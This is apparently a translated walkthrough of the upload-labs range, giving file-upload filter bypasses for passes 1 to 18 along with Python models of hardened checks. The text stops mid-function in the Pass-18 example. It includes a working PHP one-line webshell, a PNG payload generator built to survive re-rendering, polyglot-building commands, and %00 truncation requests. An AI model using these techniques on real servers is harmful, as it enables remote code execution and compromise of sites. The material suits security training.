File upload vulnerability: upload-labs range walkthrough, Pass 1-20 (with principles)

Pass-01 (JS verification)

Tip: this pass uses js on the client side to check for illegitimate image files!

A pop-up appears with a warning before any request is sent, so the check runs in the front end. As everyone knows, front-end checks are paper tigers: just disable the script.

<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">

From the form you can see that it uses the onsubmit attribute: the handler runs when the form is submitted (for example when the submit button is clicked).

return checkFile() is called the moment the form is submitted, and checkFile() inspects the chosen file before the request leaves the browser.

Bypass method:

The first method: create a new html file, paste in the page's source code, and edit it to remove the js check, disabling the script.

Then set the form's action to the submission address of the first level so that it posts to the real server.

The second method: press F12 and delete the onsubmit attribute directly.

This method is not recommended: when editing in the browser's inspector it is easy to remove legitimate js as well, and deleting that js can break the upload itself.

The third method: capture and modify the request (not recommended)

Before uploading, pick a file in an image format such as 1.png, intercept the request with Burp, and change filename="1.png" to 1.php, replacing the image contents with the one-sentence code to bypass the check.

Modifying the request in a proxy is not recommended for front-end-only checks, because there may be no request to capture at all.

It works here only because the page mixes php, html and js and actually submits to the back end, so there is a request to intercept. If the whole upload flow, from submission to parsing, were implemented in js, nothing would ever be sent to the server and there would be nothing to capture, since js runs entirely in the browser. That is also why requests sometimes cannot be captured on other websites: the page is local-side code (html, js) that never talks to a back-end server.

Pass-02 (backend verification) file type verification (MIME verification)

Tip: this pass checks the MIME type in the request on the server side!

The source code shows that only the file type (the type field) is checked: it must be image/jpeg, image/png or image/gif, and the suffix is not checked at all. Capture the request with Burp and change the Content-Type: header of the file part to one of image/jpeg, image/png or image/gif to bypass it.

Background: what is MIME?

MIME stands for Multipurpose Internet Mail Extensions. Normally the file extension is used to determine the MIME type, and the MIME type then tells the client which application opens the file; here the lab goes the other way and trusts the declared MIME type to judge the file.

$_FILES['myfile']['type'] is the MIME type of the uploaded file as declared by the browser, for example "image/gif".

A server can use the MIME information to send the correct HTTP Content-Type header, for example header("Content-type:image/gif").

File format

In the earliest HTTP protocol there was no attached data type information: everything transmitted was interpreted by the client program as an HTML document. To support multimedia data types, HTTP adopted the MIME type information placed in front of the document to identify the type of the data.
MIME, Multipurpose Internet Mail Extensions, was originally designed to attach multimedia data to e-mail so that mail clients could handle it according to its type. Once it was adopted by HTTP its significance grew: HTTP could now carry much more than plain text.
Each MIME type has two parts: a major category of the data, such as audio or image, followed by the specific kind.
The seven major categories:
video
image
application
text
audio
multipart
message
Common (general-purpose) MIME types:
HTML text .html text/html
XML document .xml text/xml
XHTML document .xhtml application/xhtml+xml
Plain text .txt text/plain
RTF text .rtf application/rtf
PDF document .pdf application/pdf
Microsoft Word file .word application/msword
PNG image .png image/png
GIF image .gif image/gif
JPEG image .jpeg,.jpg image/jpeg
au sound file .au audio/basic
MIDI music file .mid,.midi audio/midi,audio/x-midi
RealAudio music file .ra,.ram audio/x-pn-realaudio
MPEG file .mpg,.mpeg video/mpeg
AVI file .avi video/x-msvideo
GZIP file .gz application/x-gzip
TAR file .tar application/x-tar
Arbitrary binary data application/octet-stream

Steps:

Step 1: start capturing with Burp.

Step 2: upload the php file and change the Content-Type.

Uploaded successfully.

The following levels involve these functions.

Function analysis:

trim(): removes whitespace from both ends of a string
deldot(): removes the dot(s) at the end of the file name
strrchr(string, char): finds the last occurrence of char in string and returns the substring from that position to the end; returns false if the character is not found
strrchr('hello  wordld,i love you ','i')
Output: i love you 
strtolower(): converts the whole string to lowercase
str_ireplace(find, replace, string): searches string for find and, wherever it matches (case-insensitively), replaces it with replace

Pass-03 (file extension verification, blacklist bypass)

Tip: This pass prohibits uploading .asp|.aspx|.php|.jsp suffix files!

View the original code

Analyze the code:

An array is used as a blacklist, and file names with the suffixes .asp, .aspx, .php and .jsp are not allowed.

Bypass idea: php has been around a long time and has more than one file extension; we can use other php aliases to get past the blacklist: .php3 .php4 .php5 .phtml .phtm .phps .phpt .php345. There is a prerequisite: the target server must be configured to parse those extensions as php; otherwise the file uploads but is never executed.

Once the corresponding parsing is configured, just rename the file: change 1.php to whichever alias you configured.

For example: 1.php becomes 1.phtml after the modification.

Pass-04 (file name suffix verification, parsing controlled by a configuration file)

Hint:

This pass prohibits uploading files with the suffixes .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf!

Take a look at the source code

The source code shows that a blacklist is still used to check the file suffix, and the list is longer than before, but .htaccess is not on it, so we can use .htaccess to bypass it.

Introduction to .htaccess: it is a per-directory configuration file for the Apache server. Without root privileges it can change how every file in that directory is handled. So as long as you can create a .htaccess file containing a php handler directive and upload it to the server, every file in the directory where it lands will be handled as php. (.htaccess files only take effect on Apache, and only where the server's AllowOverride setting permits them.)

Steps:

1. First create a .htaccess file and write into it

SetHandler application/x-httpd-php

Save it.

2. Upload this file to the server.

3. Rename the one-sentence Trojan file to one of the gif/png/jpg formats, for example 2.png.

4. Upload 1.gif (the one-sentence Trojan file) to the server.

Upload was successful.

The key point here is the .htaccess file, which changes how every file in the directory is handled so that it is parsed as php.

So the picture 2.png we uploaded in the second step has a suffix that is not in the blacklist, but because of the .htaccess file it is parsed as php, so it executes normally.

Pass-05 (file name suffix verification stitching bypass)

Tip: there is a php file (readme.php) in the upload directory!

View source code:

Still a blacklist check: ".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

Now .htaccess is in the blacklist too.

This level looks hard to bypass, and the filtering is quite complete.

Bypass idea:

$file_name = deldot($file_name); // delete the dot at the end of the file name. This is the key point. Every filter in the code is applied only once, and here the trailing dot is deleted in a single pass, so we can use

dot + space + dot to bypass it. deldot() deletes dots from the end of the name: it removes the last dot and then continues with the character before it, but it stops as soon as it meets a space, which effectively terminates the deletion. So when uploading, we just need to end the file name with dot + space + dot, and the name that gets checked

was originally 1.php. . and becomes 1.php. (with a trailing space). That suffix is not in the blacklist, so the check passes. It also relies on a property of the operating system: when saving the file, Windows automatically strips the trailing dot and space from 1.php. , so the file that ends up on disk is 1.php.

Steps:

Step 1: directly upload the one-sentence Trojan php file.

Step 2: capture the request with Burp and modify the data

by appending . + space + . to the file name.

Step 3: forward the packet.

Done.

Pass-06 (file name suffix verification, case bypass)

Check out the tip:

This pass prohibits uploading files with the suffixes .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess!

View source code

Comparing with the previous source code, we find that strtolower() is not used to convert the suffix to lowercase, so we can bypass the blacklist by changing the case of the suffix.

Steps:

Step 1: upload a .php file

Step 2: turn on Burp capture and modify the data

Step 3: forward the packet

Uploaded successfully

Pass-07 (file name suffix verification, space bypass)

Tip:
This pass prohibits uploading files with the suffixes .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf!

View source code

The source code shows that trim() is not used to strip whitespace from the suffix. Windows treats a trailing space in a file name as nothing: when the file is finally saved, the trailing space is removed automatically.

The program's check, however, sees the space as part of the suffix and does not remove it, so the suffix with the space is not in the blacklist and the check is bypassed.

Manipulation steps:

Step 1: upload a .php file

Step 2: turn on Burp capture and modify the data, adding a space after the file name suffix

Step 3: forward the packet

Uploaded successfully

Pass-08 (file name suffix name verification, dot bypass)

Tip: This pass prohibits uploading all analyzable suffixes!

view source code

Comparing again, deldot() is not used to strip the trailing dot, so it is not deleted. Using the Windows behaviour again, a dot is appended to the suffix: Windows drops the trailing dot when the file is finally saved, while the blacklist check sees a suffix ending in a dot that is not on the list, so it is bypassed.

Manipulation steps:

Step 1: upload a .php file

Step 2: turn on Burp capture and modify the data, adding a dot after the file name suffix to bypass the check

Step 3: forward the packet

Uploaded successfully

Pass-09 (file name suffix verification, ::$DATA bypass)

Hint:

This pass prohibits uploading files with the suffixes .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess!

view source code

Compared with the previous source code, str_ireplace() is not used here to replace ::$DATA with an empty string.

What is ::$DATA?

::$DATA is a feature of how Windows (NTFS) handles files: it names the default data stream of a file. If a file name ends with ::$DATA

and nothing filters it, Windows saves the file under the name in front of ::$DATA without further checking. The point of using it is that the suffix check sees a suffix ending in ::$DATA instead of .php.

So we just need to append ::$DATA to the file name to bypass the check.

Steps:

Step 1: upload a .php file

Step 2: turn on Burp capture and modify the data, appending ::$DATA to the file name suffix to bypass the check

Step 3: forward the packet and view the file

Remove the ::$DATA at the end of the URL to see the file that was just uploaded

Uploaded successfully

Pass-10

The bypass method is the same as the fifth level, so it is not repeated here.
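As an added example (not part of the original tutorial and not upload-labs code), the following Python script models the single-pass blacklist pipeline behind Pass-05 to Pass-10, shows for each pass the name that slips through and the name Windows finally stores, and then shows the whitelist normaliser a defender would use instead. The PHP helpers (trim, deldot, strrchr, strtolower, str_ireplace) are re-modelled in Python, and the blacklist is an abbreviated version of the lab's list.

```python
"""Model of the single-pass blacklist pipeline used in Pass-05 to Pass-10,
next to a whitelist normaliser. Added example: the PHP helpers are
re-modelled in Python; none of this is the lab's own code."""
import re

# Abbreviated form of the lab's blacklist; the real list is much longer.
DENY_EXT = {".php", ".php2", ".php3", ".php4", ".php5", ".phtml", ".pht",
            ".html", ".htm", ".jsp", ".asp", ".aspx", ".htaccess"}
ALLOW_EXT = {"jpg", "png", "gif"}


def lab_filter(name, trim=True, deldot=True, lower=True, strip_data=True):
    """Return True if the lab-style blacklist accepts `name`.

    Each flag switches off one normalisation step, which is what
    distinguishes the passes: Pass-06 drops strtolower, Pass-07 drops trim,
    Pass-08 drops deldot, Pass-09 drops the ::$DATA replacement. With every
    step on, the pipeline is the Pass-05/Pass-10 one.
    """
    if trim:
        name = name.strip()                 # trim()
    if deldot:
        name = name.rstrip(".")             # deldot(): trailing dots only
    dot = name.rfind(".")
    ext = name[dot:] if dot >= 0 else ""    # strrchr($name, '.')
    if lower:
        ext = ext.lower()                   # strtolower()
    if strip_data:
        # str_ireplace('::$DATA', '', $ext): case-insensitive
        ext = re.sub(r"::\$DATA", "", ext, flags=re.I)
    if trim:
        ext = ext.strip()                   # trim() again
    return ext not in DENY_EXT


def windows_stored_name(name):
    """Model of what NTFS does with the accepted name: trailing dots and
    spaces are dropped, and ::$DATA just selects the default data stream."""
    name = re.sub(r"::\$DATA$", "", name, flags=re.I)
    return name.rstrip(". ")


def hardened_ext(name):
    """Whitelist check: the name must be a plain base name with exactly one
    dot and an allowed extension. Returns the lowercased extension, or None
    to reject. Anything odd (spaces, extra dots, streams, paths) fails the
    pattern instead of being cleaned up."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path part
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", base)
    if m is None:
        return None
    ext = m.group(1).lower()
    return ext if ext in ALLOW_EXT else None
```

The hardened check never tries to repair the name; it accepts only names that already match the allowed shape, and a server that stores uploads should still pick its own file name and keep the upload directory free of script execution.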

Pass-11 (file extension name verification, double writing bypass)

Hint:

This pass removes the strings .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess from the file name!

Check out the source code

The key point of this level is str_ireplace($deny_ext,"", $file_name); which replaces every blacklisted suffix found in the file name with an empty string. If we upload phpinfo.php and it is filtered, it becomes phpinfo, which has no suffix and cannot be parsed. But the filtering is again a single pass. For example, if we upload phpinfo.phpphp, then after one pass of filtering the original phpinfo.phpphp becomes phpinfo.php: the first php is matched and replaced, but the second php survives the replacement.

Steps:

Step 1: upload a .php file

Step 2: turn on Burp capture and modify the data, inserting an extra php into the file name suffix to bypass the check.

Step 3: forward the packet

Success

Pass-12 (file name suffix whitelist verification, GET %00 truncation)

hint:

The upload path of this pass is controllable!

view source code

Source code analysis:

1. $ext_arr = array('jpg','png','gif'); an array is used as a whitelist.

2. $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);

The suffix is cut from the file name starting at the position after the last dot; strrpos searches through the whole name for that dot rather than taking the first match.

The value checked is $_FILES['upload_file']['name'].

3. if(in_array($file_ext,$ext_arr)){ checks whether the suffix of the uploaded file name is in the whitelist, and if so enters the branch.

4. $temp_file = $_FILES['upload_file']['tmp_name']; inside the branch, the uploaded file is in a temporary directory under a temporary name.

5. $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext; (this step is the key)

$_GET['save_path'] accepts a custom path, a random number between 10 and 99 and a timestamp form the file name,

and the suffix $file_ext extracted above is spliced onto the end.

6. if(move_uploaded_file($temp_file,$img_path)){

finally moves the temporary file $temp_file to $img_path.

principle:

The %00 truncation exploits a php flaw. php is implemented in C, and in C a NUL byte (hex 00) terminates a string. In php versions below 5.3.4, when move_uploaded_file stores the file and the path contains a character with hex value 00, the underlying code treats it as the end of the string and ignores everything after it, so the path is truncated at the 00.

Bypass ideas:

First, a whitelist is used. From the code, the suffix of the uploaded file name is checked first.

So in the first step the $_FILES['upload_file']['name'] we upload must have a suffix in the whitelisted .jpg/.png/.gif format. After passing the suffix check we enter the branch. Last but not least, the file is saved at

$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext; which is determined by the upload path. The original parameter is $_GET['save_path'], with save_path=../upload/, so the upload path is controllable. We use %00 to truncate it, turning the path into the file name we want, and move_uploaded_file is where the %00 truncation takes effect.

Without %00 truncation, the final uploaded file name would be

../upload/  +  237298  +  .png
($_GET['save_path']  +  rand(10, 99).date("YmdHis")  +  "." . $file_ext)

After truncating with %00:

../upload/1.php%00  +  237298  +  .png
($_GET['save_path']  +  rand(10, 99).date("YmdHis")  +  "." . $file_ext)

The file finally saved becomes

../upload/1.php

Steps:

Step 1: upload a .php file

Step 2: capture with Burp and modify the data: change the suffix to an image format, filename="phpinfo.png",

replace the file contents, and modify the query string to ?save_path=../upload/1.php%00

 

 

Visit the image address.

Delete the trailing parameters, because the file finally saved in the directory is 1.php.

Uploaded successfully

Note: To pass this level and the next one, you need to change php to a version <5.3.4, and turn off the magic_quotes_gpc option in php.ini.

Pass-13 (file name suffix whitelist verification, POST %00 truncation)

Tip: The upload path of this pass is controllable!

There is not much to say about this level. The principle is the same as the previous level, but the parameter is passed via POST, so the %00 has to be decoded in the request body.

A %00 in a GET query string is automatically URL-decoded by the server.

For example, if you type a space into the URL, the browser URL-encodes it itself, so the server knows what you want; a %00 in the URL is handled the same way.

In a POST body, however, %00 is not automatically decoded: the %00 you type is treated as the literal three characters %, 0, 0 (and would be sent as %25%30%30 if encoded again), which is not the 0x00 byte we want, so it has to be converted to a real null byte first.

Steps:

Step 1: upload a .php file

Step 2: capture with Burp and modify the data: change the suffix to an image format, filename="phpinfo.png",

and set save_path=../upload/1.php%00

Select the %00 and convert it (URL-decode it)

Forward the packet

Uploaded successfully

Pass-14 (file content check, file header verification)

Tip: this pass checks the first 2 bytes of the file contents!

Take a look at the source code

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read only 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
    $fileType = '';
    switch($typeCode){
        case 255216:
            $fileType = 'jpg';
            break;
        case 13780:
            $fileType = 'png';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

Code analysis: this level checks the image contents. The hint says it checks the file header: it reads the first 2 bytes of the uploaded file and determines the file type from that binary header. So changing the suffix is useless at this level; use an image horse (a picture with code appended) to bypass it.
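As an added example (not part of the tutorial and not upload-labs code), the Python below puts the lab's two-byte header test from this level beside a full-signature sniff and the declared Content-Type comparison of Pass-02, and shows why neither check tells a plain image from an image with text appended. GIF_SAMPLE and POLYGLOT are constructed byte strings; the appended text is a harmless marker, not a working script.

```python
"""Content checks for uploads: the lab's two-byte header test (Pass-14)
beside a full-signature sniff and the declared-MIME comparison (Pass-02).
Added example, not the lab's code; the image bytes are constructed."""

# Constructed 1x1 GIF89a: header, logical screen, one image block, trailer.
GIF_SAMPLE = (b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00"
              + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
              + b"\x02\x02\x44\x01\x00\x3b")
# Constructed polyglot: valid image bytes with text appended, the shape that
# `copy 1.gif /b + 1.php /a` produces. The appended text is only a marker.
POLYGLOT = GIF_SAMPLE + b"<?php echo 'marker'; ?>"

SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_TO_MIME = {"jpg": "image/jpeg", "png": "image/png", "gif": "image/gif"}


def lab_two_byte_type(data):
    """Model of getReailFileType(): the decimal values of the first two bytes
    are concatenated as strings and compared as one integer."""
    if len(data) < 2:
        return "unknown"
    code = int(str(data[0]) + str(data[1]))
    return {255216: "jpg", 13780: "png", 7173: "gif"}.get(code, "unknown")


def sniff_type(data):
    """Compare the full magic signature rather than two bytes."""
    for ext, sigs in SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return ext
    return "unknown"


def contains_script_marker(data):
    """Detection heuristic for image/script polyglots: a PHP open tag anywhere
    in the body. Easy to evade with encoding, so it is a signal, not a gate."""
    return b"<?php" in data.lower() or b"<?=" in data


def validate_upload(declared_mime, data, ext):
    """Require extension, declared Content-Type and sniffed content to agree,
    and refuse bodies carrying a script marker. Returns (ok, reason)."""
    ext = ext.lower()
    if ext not in EXT_TO_MIME:
        return False, "extension not whitelisted"
    if declared_mime != EXT_TO_MIME[ext]:
        return False, "declared Content-Type does not match extension"
    if sniff_type(data) != ext:
        return False, "file signature does not match extension"
    if contains_script_marker(data):
        return False, "script marker inside image body"
    return True, "ok"
```

Both header tests classify POLYGLOT as a gif, which is exactly what the `copy /b` trick relies on; the marker scan catches this simple case but not an encoded payload, so the durable mitigation is to re-encode the image (what Pass-17 does), store it under a server-generated name, and serve uploads from a location where the web server does not execute scripts.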

Steps:

1. Make an image horse: prepare a picture and a php file containing the one-sentence Trojan.

2. Open cmd and build the image horse with the command

copy 1.jpg /b + 1.php /a  shell.php

3. Upload it directly.

Copy the image link address.

4. Open the "file inclusion vulnerability" address and pass the parameters.

Pass-15-16 (file content check)

The bypass method is the same as the previous level.

No matter how carefully the code is written or which function does the filtering, as long as the image horse still displays normally in the browser it can be opened, and then the file inclusion vulnerability can be used to execute it. (The premise is that such an inclusion vulnerability exists. Without it, each format is parsed as what it is: an image is parsed as an image and code as code. Don't expect an image to be parsed as code on its own.)

Pass-17 (file content inspection, image secondary rendering)

Tip: This pass re-renders the picture!

view source code

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // get the basic info of the uploaded file: name, type, size, temporary path
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // get the extension of the uploaded file
    $fileext= substr(strrchr($filename,"."),1);

    // check the suffix and type; only upload if both are valid
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            // generate a new image from the uploaded one
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                // assign a file name to the new image
                srand(time());
                $newfilename = strval(rand()).".jpg";
                // display the re-rendered image (the new image generated from the user's upload)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            // generate a new image from the uploaded one
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                // assign a file name to the new image
                srand(time());
                $newfilename = strval(rand()).".png";
                // display the re-rendered image (the new image generated from the user's upload)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            // generate a new image from the uploaded one
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                // assign a file name to the new image
                srand(time());
                $newfilename = strval(rand()).".gif";
                // display the re-rendered image (the new image generated from the user's upload)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

Code analysis:

This level mainly uses the imagecreatefrom* family of functions.

These functions create a new image from the uploaded picture and return the result in a variable:

an image resource on success, false on failure. When rebuilding the picture, the function separates the real image data from anything that is not image data. In other words, if we append code to a picture, that code is filtered out when the image is regenerated after upload; only the pixel data is kept, re-sorted and reconstructed.

This regeneration by imagecreatefrom* is the "secondary rendering" of the picture.

Steps:

With the help of the 010 Editor tool.

GIF format bypass

Step 1: first merge the GIF image and the code file into one image with the command

copy 1.gif /b + 1.php /a  blank.gif

Step 2: upload the merged file to the server.

Step 3: open the GIF synthesised in step 1 with 010 Editor.

Then find the picture uploaded in step 2 in the upload directory and open the re-rendered copy with 010 Editor as well.

Step 4: compare the two files.

Look for the regions (shown in blue) that were not altered by the re-rendering.

Insert the one-sentence code into such a region of the re-rendered 7907.gif image,

then save it.

Step 5: move the 7907.gif you just saved from the upload directory to the directory you upload from.

Step 6: re-upload the 7907.gif image to the server.

Step 7: open the file inclusion vulnerability url and pass the parameters.

Success

Bypassing with a PNG image.
I thought that the image structure of png and jpg is different from that of gif, so the exploitation is damaged. Here we need to use a script from an expert (大牛) to complete it.

The expert's script

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

Step 1: create a .php file containing the expert's script.
Step 2: prepare a picture in png format.

Step 3: open cmd and run the php script with the php command

php beffpng.php hh.png  (generates a new 1.png image file)

Step 4: upload 1.png.
Step 5: copy the image address into the file inclusion vulnerability url and open it.
Step 6: pass parameters to the one-sentence code embedded by the expert's script, <?$_GET[0]( $_POST[1]);?>
127.0.0.1/upload-labs/include.php?file=upload/126.png&0=assert
1=phpinfo();

 Finish

For jpg I really can't figure it out. I spent the whole afternoon looking for a way; either the script or the picture wouldn't get through.
Because my experiment didn't succeed, I won't post a tutorial for it, since I'm not sure about it. You can search for scripts
or tutorials yourself.

Pass-18 (logic loophole, race condition) secondary rendering

hint:

Code audit required!

View source code:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

Code analysis:

$ext_arr = array('jpg','png','gif'); a whitelist built from an array

$file_name = $_FILES['upload_file']['name']; read the uploaded file name from the superglobal

$temp_file = $_FILES['upload_file']['tmp_name']; the uploaded file is stored in a temporary directory under a temporary name

substr($file_name,strrpos($file_name,".")+1); find the position of the last . and cut out the file extension

$upload_file = UPLOAD_PATH . '/' . $file_name; set the upload path


if(move_uploaded_file($temp_file, $upload_file)){ move the file from the temporary path to $upload_file

under this path

if(in_array($file_ext,$ext_arr)){ check the file name suffix

$img_path = UPLOAD_PATH . '/'.rand(10, 99).date("YmdHis").".".$file_ext; if it passes, build the final path from a random number and a timestamp, and splice the suffix on the end

rename($upload_file, $img_path); rename $upload_file to $img_path

This level is a logic loophole.

The developer does not validate first; the file is validated only after it has been uploaded.

if(move_uploaded_file($temp_file, $upload_file)){ in this step the file is moved onto the server before any check, so whatever file you upload, it lands on the server before the verification runs.

Bypass ideas:

We can use a race condition to bypass this. While uploading the file we keep sending the request to the server, and from another browser we keep requesting the path of the uploaded file, calling it constantly so that it is reached before the subsequent verification and deletion run. Then the file keeps whatever format you uploaded.

What is a race condition?

It is a technique, not a vulnerability in itself. It amounts to accessing the file immediately, before the file proceeds to the next step,

operating on it and keeping it busy so that the subsequent operations cannot complete.

For example: open a text file, write to it, and keep the process open; then try to delete it while it is being edited and see whether the deletion succeeds.

What is secondary rendering?

I personally think of secondary rendering as a second operation on the file. The second rendering is not itself a loophole; the technique it uses is a second pass over the file, and that does not mean secondary rendering is vulnerable. The loophole here exists because the developer did not verify in the first step; had the verification been done first, the secondary rendering technique would be fine.
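As an added example (not part of the tutorial and not upload-labs code), the Python below models the order of operations that makes this level a race: the lab moves the upload into the web directory first and validates afterwards, while the hardened version validates in the temporary location and moves only what passed, under a server-chosen name. A `probe` callback stands in for the second request that arrives between the two steps, so the window can be shown deterministically without real concurrency; the upload body and file names are constructed.

```python
"""Order of operations in Pass-18: move-then-validate (the lab) beside
validate-then-move (hardened). Added example, not the lab's code. `probe`
stands in for a concurrent request that hits the web path between steps."""
import os
import secrets
import shutil
import tempfile

ALLOW_EXT = {"jpg", "png", "gif"}


def ext_of(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def vulnerable_upload(upload_dir, temp_path, file_name, probe):
    """move_uploaded_file() first, in_array() check second (the lab's order).
    Returns (accepted, exposed): exposed is True if the probe could reach the
    file under the user's own name while it sat in upload_dir."""
    dest = os.path.join(upload_dir, file_name)
    shutil.move(temp_path, dest)            # web-reachable from this point
    exposed = probe(dest)                   # concurrent request lands here
    ext = ext_of(file_name)
    if ext in ALLOW_EXT:
        os.rename(dest, os.path.join(upload_dir, secrets.token_hex(4) + "." + ext))
        return True, exposed
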